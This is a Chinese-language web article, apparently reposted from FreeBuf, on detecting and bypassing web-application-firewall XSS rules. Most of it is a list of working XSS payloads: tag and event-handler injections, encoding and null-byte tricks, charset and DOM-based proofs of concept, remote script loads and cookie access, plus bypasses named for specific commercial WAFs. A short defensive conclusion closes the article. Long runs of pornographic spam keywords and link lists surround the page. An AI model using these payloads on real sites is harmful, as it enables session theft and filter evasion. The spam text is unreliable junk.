精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

XSS現代WAF規則探測及繞過技術

安全 應用安全
黑名單方式永遠不是最好的解決辦法,但是相對與白名單效率很高,對于WAF供應商來說,最好的實踐如下:開發者和管理員要注意WAF只能緩解攻擊,并且針對已知的弱點的防護只是和源代碼修復的方法打個時間差……

初始測試

1、使用無害的payload,類似<b>,<i>,<u>觀察響應,判斷應用程序是否被HTML編碼,是否標簽被過濾,是否過濾<>等等;
2、如果過濾閉合標簽,嘗試無閉合標簽的payload(<b,<i,<marquee)觀察響應;
3、嘗試以下的payload
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm      (1);</script>
<script src="http://rhainfosec.com/evil.js">

判斷是否觸發過濾規則,嘗試使用大小寫混合字符

<scRiPt>alert(1);</scrIPt>
1、如果大小寫不行的話,<script>被過濾嘗試<scr<script>ipt>alert(1)</scr<script>ipt>;
2、使用<a>標簽測試
<a  href=“http://www.google.com">Clickme</a>
<a被過濾?
href被過濾?
其他內容被過濾?
如果沒有過濾嘗試使用<a href=”javascript:alert(1)”>Clickme</a>
嘗試使用錯誤的事件查看過濾<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
HTML5擁有150個事件處理函數,可以多嘗試其他函數<body/onhashchange=alert(1)><a href=#>clickit

#p#測試其他標簽

src屬性

<img src=x      onerror=prompt(1);>
<img/src=aaa.jpg      onerror=prompt(1);
<video src=x      onerror=prompt(1);>
<audio src=x      onerror=prompt(1);>

iframe

<iframesrc="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

Embed

<embed/src=//goo.gl/nlX0P>

Action

<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>

mario驗證

<formaction=&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;><button>CLICK

“formaction”屬性

<isindexformaction="javascript:alert(1)"      type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME

“background”屬性

<table background=javascript:alert(1)></table> // Works on Opera 10.5      and IE6

“posters” 屬性

<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5

“data”屬性

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?

“code”屬性

<applet code="javascript:confirm(document.cookie);"> // Firefox Only
<embed  code="http://businessinfo.co.uk/labs/xss/xss.swf"      allowscriptaccess=always>

事件處理

<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">

短payload

<q/oncut=open()>
<q/oncut=alert(1)> //      Useful in-case of payload restrictions.

嵌套欺騙

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body  language=vbsonload=alert-1 // Works with IE8
<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6    9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>      // Works with IE8

圓括號被過濾

<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;

Expression 屬性

<img style="xss:expression(alert(0))"> // Works upto IE7.
<div style="color:rgb(&#039;&#039;x:expression(alert(1))"></div>      // Works upto IE7.
<style>#test{x:expression(alert(/XSS/))}</style>      // Works upto IE7

“location”屬性

<a onmouseover=location=’javascript:alert(1)>click
<body onfocus="location=&#039;javascrpt:alert(1) >123

其他Payload

<meta http-equiv="refresh"      content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh"      content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g      onload="javascript:\u0061lert(1);"></g></svg> //      By @secalert
<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href"      values=";javascript:alert(1)" begin="0s"      dur="0.1s" fill="freeze"/> // By Mario
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg>      // By @secalert
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed

();:被過濾

<svg><script>alert&#40/1/&#41</script>      // Works With All Browsers
( is html encoded to &#40
) is html encoded to &#41

Opera的變量

<svg><script>alert&#40      1&#41 // Works with Opera Only

實體解碼

&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
<a  href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>

編碼

JavaScript是很靈活的語言,可以使用十六進制、Unicode、HTML等進行編碼,以下屬性可以被編碼(支持HTML, Octal, Decimal,Hexadecimal, and Unicode)

href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
data= //只支持base64

#p#基于上下文的過濾

WAF最大的問題是不能理解內容,使用黑名單可以阻擋獨立的js腳本,但仍不能對xss提供足夠的保護,如果一個反射型的XSS是下面這種形式

輸入反射屬性

<input value="XSStest" type=text>
我們可以使用 “><imgsrc=x  onerror=prompt(0);>觸發,但是如果<>被過濾,我們仍然可以使用“ autofocusonfocus=alert(1)//觸發,基本是使用“ 關閉value屬性,再加入我們的執行腳本
" onmouseover="prompt(0) x="
" onfocusin=alert(1)     autofocus x="
" onfocusout=alert(1)     autofocus x="
" onblur=alert(1) autofocus     a="
輸入反射在<script>標簽內
類似這種情況:
<script>
Var
x=”Input”;
</script>
通常,我們使用“></script>,閉合前面的</script>標簽,然而在這種情況,我們也可以直接輸入執行腳本alert(), prompt()
confirm() ,例如:
“;alert(1)//

非常規事件監聽

DOMfocusin,DOMfocusout,等事件,這些需要特定的事件監聽適當的執行。例如:

";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//

此類事件的列表

DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

超文本內容

代碼中的情況如下

<a  href=”Userinput”>Click</a>
可以使用javascript:alert(1)//直接執行<a
href=”javascript:alert(1)//”>Click</a>

變形

主要包含大小寫和JavaScript變形

javascript&#058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;alert&lpar;document&period;cookie&rpar;      // AsharJaved

IE10以下和URI中可以使用VBScript

vbscript:alert(1);
vbscript&#058;alert(1);
vbscr&Tab;ipt:alert(1)"

Data URl

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

JSON內容

反射輸入

encodeURIComponent(&#039;userinput&#039;)

可以使用

-alert(1)-
-prompt(1)-
-confirm(1)-

結果

encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)

輸入反射在svg標簽內

源碼如下:

<svg><script>varmyvar=”YourInput”;</script></svg>

可以輸入

www.site.com/test.php?var=text”;alert(1)//

如果系統編碼了”字符

<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>

原因是引入了附加的(XML)到HTML內容里,可以使用2次編碼處理

#p#瀏覽器BUG

字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集編碼,我們可以繞過99% 的WAF過濾。

示例

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

可以控制編碼,提交

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img src=x onerror=prompt(0);>

可以修改為UTF-32編碼形式

???script?alert(1)?/script?
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

空字節

最長用來繞過mod_security防火墻,形式如下:

<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

空字節只適用于PHP 5.3.8以上的版本

語法BUG

RFC聲明中節點名稱不能是空格,以下的形式在javascript中不能運行

<script>alert(1);</script>
<%0ascript>alert(1);</script>
<%0bscript>alert(1);</script>
<%, <//, <!,<?可以被解析成<,所以可以使用以下的payload
<//     style=x:expression\28write(1)\29> // Works upto IE7
參考http://html5sec.org/#71
<!--[if]><script>alert(1)</script     --> // Works upto IE9
參考http://html5sec.org/#115
<?xml-stylesheet     type="text/css"?><root     style="x:expression(write(1))"/> // Works in IE7
參考 http://html5sec.org/#77
<%div%20style=xss:expression(prompt(1))>     // Works Upto IE7

Unicode分隔符

[on\w+\s*]這個規則過濾了所有on事件,為了驗證每個瀏覽器中有效的分隔符,可以使用fuzzing方法測試0×00到0xff,結果如下:
IExplorer=     [0x09,0x0B,0x0C,0x20,0x3B]
Chrome =     [0x09,0x20,0x28,0x2C,0x3B]
Safari = [0x2C,0x3B]
FireFox=     [0x09,0x20,0x28,0x2C,0x3B]
Opera = [0x09,0x20,0x2C,0x3B]
Android =     [0x09,0x20,0x28,0x2C,0x3B]
x0b在Mod_security中已經被過濾,繞過的方法:
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

缺少X-frame選項

通常會認為X-frame是用來防護點擊劫持的配置,其實也可以防護使用iframe引用的xss漏洞

Docmodes

IE引入了doc-mode很長時間,提供給老版本瀏覽器的后端兼容性,有風險,攻擊情景是黑客可以引用你站點的框架,他可以引入doc-mode執行css表達式

expression(open(alert(1)))

以下POC可以插入到IE7中

<html>
<body>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<iframesrc="https://targetwebsite.com">
</body>
</html>

Window.name欺騙

情景:我們用iframe加載一個頁面,我們可以控制窗口的名稱,這里也可以執行javascript代碼

POC

<iframesrc=&#039;http://www.target.com?foo="xss  autofocus/AAAAA  onfocus=location=window.name//&#039;
name="javascript:alert("XSS")"></iframe>

DOM型XSS

服務器不支持過濾DOM型的XSS,因為DOM型XSS總是在客戶端執行,看一個例子:

<script>
vari=location.hash;
document.write(i);
</script>

在一些情況下,反射型XSS可以轉換成DOM型XSS:
http://www.target.com/xss.php?foo=<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()
上面的POC只在[.+都被允許的情況下適用,可以使用location.hash注入任何不允許的編碼

Location.hash[1] = :  // Defined at the first position after     the hash.
Location.hash[2]= (  // Defined at the second position after     the has
Location.hash[3] = ) // Defined     at third position after the hash.

如果有客戶端過濾可能不適用#p#

繞過

ModSecurity繞過

<scri%00pt>confirm(0);</scri%00pt>
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

參考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

WEB KNIGHT繞過

<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>

F5 BIG IP ASM and Palo ALTO繞過

<table background="javascript:alert(1)"></table> //IE6或者低版本Opera
“/><marquee  onfinish=confirm(123)>a</marquee>

Dot Defender繞過

<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>

結論

黑名單方式永遠不是最好的解決辦法,但是相對與白名單效率很高,對于WAF供應商來說,最好的實踐如下:

1、開發者和管理員要注意WAF只能緩解攻擊,并且針對已知的弱點的防護只是和源代碼修復的方法打個時間差;
2、要保持WAF的規則庫更新;
3、WAF可以配置參數限制,需要提供手冊用于配置參數content-length最大最小長度,content-type類型,在入侵時進行告警;
4、如果WAF依據黑名單,要確保可以阻斷已知的瀏覽器BUG,并且相應規則庫要及時更新。
責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-12-30 14:17:22

WAFWAF指紋探測WAF檢測

2012-12-24 13:50:54

2013-01-11 16:23:29

2013-05-22 18:06:41

2013-06-03 10:02:53

WAF繞過

2019-02-19 08:45:41

2013-05-13 11:25:02

WAFWeb應用防火墻WAF繞過

2020-07-31 11:02:09

網絡攻擊WAF黑客

2011-09-06 16:56:43

2015-06-16 13:37:03

2016-02-15 10:18:11

2017-03-03 09:10:09

2019-07-04 22:54:15

防火墻CMP系統安全

2009-10-26 11:43:43

2014-12-16 10:23:59

2022-03-08 14:23:38

APIWeb前端

2018-03-01 08:56:20

存儲能力定位

2013-04-19 13:20:14

2020-10-15 10:31:33

利用Prototype

2017-08-07 18:45:51

前端JavaScript技術棧
點贊
收藏

51CTO技術棧公眾號

欧美夜福利tv在线| 精品人在线二区三区| 亚洲欧美日韩国产成人综合一二三区 | av中文字幕一区| 日本亚洲精品在线观看| 亚洲一二三在线观看| 91欧美极品| 欧美中文字幕一区| 中文精品无码中文字幕无码专区| 天天摸夜夜添狠狠添婷婷| 全部av―极品视觉盛宴亚洲| 欧美成人三级视频网站| 久久精品无码一区| 伊人精品综合| 欧美日韩一区三区| 欧美国产激情视频| av文字幕在线观看| 久久九九久精品国产免费直播| 91视频国产一区| 在线观看免费av片| 影音国产精品| 久久精品视频一| 香港三级日本三级| 久久久久毛片免费观看| 色婷婷一区二区| 国产欧美日韩网站| 久草免费在线| 日本一区二区三区dvd视频在线| 国产精品久久亚洲7777| 国产精品久久久久久久免费看 | 国产精品蜜臀av| 精品国产福利| 亚洲国产精彩视频| 国产一区二区三区在线观看精品| 国产成人精品一区二区三区| 1级黄色大片儿| 欧美久久久久| 久久在线视频在线| 糖心vlog免费在线观看| 欧美亚洲激情| 亚洲天堂影视av| 久久精品成人av| 噜噜噜天天躁狠狠躁夜夜精品| 欧美一区二区三区日韩视频| 超碰在线97免费| 88xx成人永久免费观看| 欧美性极品xxxx娇小| 亚洲 欧美 日韩 国产综合 在线| 免费在线国产视频| 亚洲综合色自拍一区| 中日韩在线视频| 欧美性videos| 成人欧美一区二区三区视频网页 | 免费无码一区二区三区| 成人动态视频| 亚洲国产精品推荐| 亚洲综合自拍网| 少妇精品导航| 亚洲精品综合久久中文字幕| 亚洲永久无码7777kkk| 国产乱人伦丫前精品视频| 亚洲精品一区二区三区精华液| 男人的天堂免费| 北条麻妃一区二区三区在线观看| 精品乱码亚洲一区二区不卡| 手机免费看av片| 久久99国产精品久久99大师| 日韩国产欧美精品在线| 久久av无码精品人妻系列试探| 亚洲人挤奶视频| 国产亚洲精品久久| 欧美性生给视频| 在线国产一区二区| 久久久在线免费观看| 欧美bbbbbbbbbbbb精品| 视频一区中文字幕国产| 国产美女主播一区| 亚洲精品18p| 2023国产精品自拍| 亚欧精品在线| 伊人福利在线| 欧美午夜美女看片| 日本黄大片一区二区三区| 国产高清精品二区| 亚洲国产高潮在线观看| 在线观看福利片| 日本成人小视频| 久久精品99国产精品酒店日本 | 色综合久久综合网97色综合 | 色婷婷777777仙踪林| 日本一本在线免费福利| 色综合久久综合网97色综合| 最新国产黄色网址| 欧美a一欧美| 中文字幕在线成人| 国产午夜久久久| 美女一区二区视频| 国产伦精品一区二区三区视频孕妇| 五月婷中文字幕| 国产精品青草久久| 欧美日韩成人免费视频| 国产激情欧美| 亚洲国产第一页| 亚洲一二三在线观看| 午夜一区在线| 91成人免费看| av电影在线观看| 精品人伦一区二区三区蜜桃网站 | 久久婷婷综合激情| 中文字幕中文字幕在线中心一区| 免费高潮视频95在线观看网站| 欧美日韩亚州综合| 91精品国产自产| 欧美国产专区| 国产精品影片在线观看| 天天摸夜夜添狠狠添婷婷| 亚洲欧美日韩小说| 国产一二三四在线视频| 网曝91综合精品门事件在线| 九九视频直播综合网| 亚洲天堂网在线视频| 91欧美激情一区二区三区成人| 污污污污污污www网站免费| 日韩一区二区三区免费视频| 日韩成人在线免费观看| 激情五月婷婷小说| 国产在线精品免费av| 日本一区视频在线观看| 欧美私密网站| 亚洲第一区第一页| 加勒比av在线播放| 国产综合色产在线精品 | 欧美日本不卡高清| 成人午夜激情免费视频| 成年人在线视频免费观看| 天天影视涩香欲综合网| 香蕉视频污视频| 欧美精品aa| 91亚洲va在线va天堂va国| 91大神在线网站| 在线精品观看国产| 三上悠亚影音先锋| 销魂美女一区二区三区视频在线| 国产乱子伦精品| 久久免费电影| 欧美videos中文字幕| 国产一区二区播放| 国产一区二区三区蝌蚪| 51xx午夜影福利| 高清一区二区三区av| 久久精品美女视频网站| 国产精品热久久| 亚洲精品视频在线看| 亚洲综合在线一区二区| 91精品秘密在线观看| 亚洲尤物视频网| 成人福利电影| 亚洲国产精品字幕| 在线观看免费国产视频| 91丨国产丨九色丨pron| 国产91对白刺激露脸在线观看| 亚洲国产欧美日韩在线观看第一区 | 日韩和一区二区| av成人老司机| 日本老熟妇毛茸茸| 久久影视一区| 91探花福利精品国产自产在线| 黄色免费在线网站| 精品国产亚洲在线| 国产成人在线视频观看| 国产亚洲欧美在线| 污视频网址在线观看| 欧美69视频| 精品国产乱码久久久久久108| 亚洲精品mv| 神马国产精品影院av| 国产老妇伦国产熟女老妇视频| 亚洲一级电影视频| 熟女俱乐部一区二区视频在线| 日韩激情一二三区| 99re99热| 亚洲成a人片77777在线播放| 国产精品免费一区豆花| 97超碰资源站在线观看| 日韩精品在线视频美女| 在线观看免费中文字幕| 亚洲一区二区中文在线| 无码h肉动漫在线观看| 韩国v欧美v亚洲v日本v| 国产av天堂无码一区二区三区| 国产乱码精品一区二区亚洲| 91免费看国产| 日本不良网站在线观看| 日韩在线小视频| 午夜18视频在线观看| 欧美人xxxx| 亚洲男人第一av| 亚洲欧洲国产日韩| 污污内射在线观看一区二区少妇| 美女网站色91| 成人黄色av片| 91精品国产乱码久久久久久| 看高清中日韩色视频| 成人精品视频在线观看| 日本国产高清不卡| 国产丝袜精品丝袜| 中文字幕亚洲专区| 三级理论午夜在线观看| 日韩欧美国产电影| 国产女主播喷水视频在线观看| 亚洲综合激情另类小说区| 99久久久无码国产精品衣服| 高清成人在线观看| 一区二区久久精品| 视频在线观看国产精品| 亚洲国产成人精品无码区99| 欧美一区二区三区久久精品茉莉花 | 国产精品入口免费软件| 国产日韩免费| 欧美在线观看视频免费| 欧美激情国产在线| 秋霞毛片久久久久久久久| 粉嫩一区二区三区四区公司1| 成人国产精品一区| 亚洲成人激情社区| 91av在线影院| 第一中文字幕在线| 九九精品在线观看| 国产原创精品视频| 中文亚洲视频在线| 九一国产在线| 亚洲精品中文字幕有码专区| 人妻精品一区二区三区| 欧美一区二区三区在线观看视频| 波多野结衣一区二区在线 | 久久亚洲精品中文字幕冲田杏梨| 你懂的在线观看| 国产视频久久久久久久| 手机在线观看毛片| 亚洲国产成人精品电影| 色欲av伊人久久大香线蕉影院| 欧美成人精品3d动漫h| 国产suv精品一区二区69| 91麻豆精品久久久久蜜臀| 中文字幕精品一区二区精| 欧美在线观看一二区| 男人天堂视频在线| 在线一区二区视频| 超碰在线免费97| 欧美亚洲国产bt| 中文字幕在线观看1| 欧美三片在线视频观看| 亚洲熟妇av乱码在线观看| 欧美日韩高清一区二区不卡| 亚洲一区二区视频在线播放| 欧美日韩激情一区二区| 91国内精品视频| 欧美一区二区在线免费观看| av手机免费看| 欧美va在线播放| 无码国产精品高潮久久99| 日韩av一卡二卡| 国产三级电影在线观看| 这里只有精品在线观看| 麻豆视频在线观看免费网站| 日韩视频免费观看| 2024短剧网剧在线观看| 久久久久久香蕉网| 超碰国产一区| 国产精品网址在线| 免费观看性欧美大片无片| 国产激情美女久久久久久吹潮| 国产精品17p| 日韩欧美一区二区视频在线播放| 久久亚洲成人| 日本五级黄色片| 久久精品电影| 亚洲午夜激情影院| 不卡的av电影| 手机毛片在线观看| 一区二区三区精品视频在线| 亚洲精品视频在线观看免费视频| 欧美伊人精品成人久久综合97 | 精品久久免费观看| 黄色日韩精品| 一级黄色香蕉视频| 国产成人精品免费看| av无码av天天av天天爽| 国产精品国产三级国产aⅴ入口 | 亚洲第一页自拍| 国产福利片在线| 精品视频9999| 成人午夜精品| 官网99热精品| 国产尤物久久久| 日本黄xxxxxxxxx100| 国产精品久久久久久久久久妞妞| 91制片厂毛片| 91麻豆免费观看| 91免费公开视频| 日韩欧美在线观看| 草逼视频免费看| 亚洲视频第一页| 精品一性一色一乱农村| 国产精品v片在线观看不卡| www.神马久久| 中文字幕一区二区三区有限公司 | 欧美亚洲国产bt| 天堂成人在线观看| 免费观看一级特黄欧美大片| 精品日本一区二区| 91精品天堂福利在线观看| 91国视频在线| 国产激情一区二区三区| 夫妇交换中文字幕| 偷拍日韩校园综合在线| 国产精品久久久久久久久毛片 | 国产午夜无码视频在线观看| 精品国产一区二区三区av性色| 网友自拍视频在线| 日本免费久久高清视频| av日韩精品| 成人污网站在线观看| 久久精品国产亚洲高清剧情介绍 | 亚洲图片久久| 美女扒开大腿让男人桶| 国产曰批免费观看久久久| 三区四区在线观看| 色综合欧美在线| 亚洲日本香蕉视频| 久久久久久久国产精品| 精品一区二区三区中文字幕在线 | 波多野结衣家庭教师在线观看| 精品久久中文字幕| 可以免费观看的毛片| 色综合导航网站| 亚洲码欧美码一区二区三区| 日韩 欧美 自拍| 精品一区二区在线视频| 9.1片黄在线观看| 欧美专区亚洲专区| eeuss影院在线观看| 国产成人精品国内自产拍免费看| 免费黄色成人| 国产成人久久777777| 2022国产精品视频| 青青青国产在线| 国产视频精品xxxx| 成人啊v在线| 水蜜桃一区二区三区| 日本成人超碰在线观看| 极品蜜桃臀肥臀-x88av| 欧美四级电影在线观看| 99精品老司机免费视频| 国产精品自产拍在线观| 五月天综合网站| 女教师高潮黄又色视频| 亚洲在线视频一区| 蜜臀av免费在线观看| 91国产美女在线观看| 日韩av系列| 99免费视频观看| 最新中文字幕一区二区三区| 国产深喉视频一区二区| 欧美激情中文字幕在线| 极品国产人妖chinesets亚洲人妖| 欧美一级视频免费看| 久久久国产午夜精品| 亚洲专区在线播放| 欧美人成在线视频| 日韩深夜影院| 国产aaaaa毛片| 一区二区三区欧美日韩| 手机在线不卡av| 国产精品美女免费视频| 性欧美69xoxoxoxo| 强迫凌虐淫辱の牝奴在线观看| 色综合一个色综合| 成人在线视频亚洲| 激情视频一区二区| 毛片一区二区三区| 久操免费在线视频| 亚洲女成人图区| 在线日韩三级| 国产97在线 | 亚洲| 国产精品乱码久久久久久| 精品区在线观看| 日韩免费高清在线观看| 亚洲色图欧美| 国产美女喷水视频| 91精品国产乱码久久蜜臀| 高潮在线视频| 精品91一区二区三区| 91片黄在线观看| 99久久精品国产一区色| 日韩av电影在线网| 国产综合亚洲精品一区二| 中字幕一区二区三区乱码| 精品动漫一区二区三区在线观看| 丁香久久综合|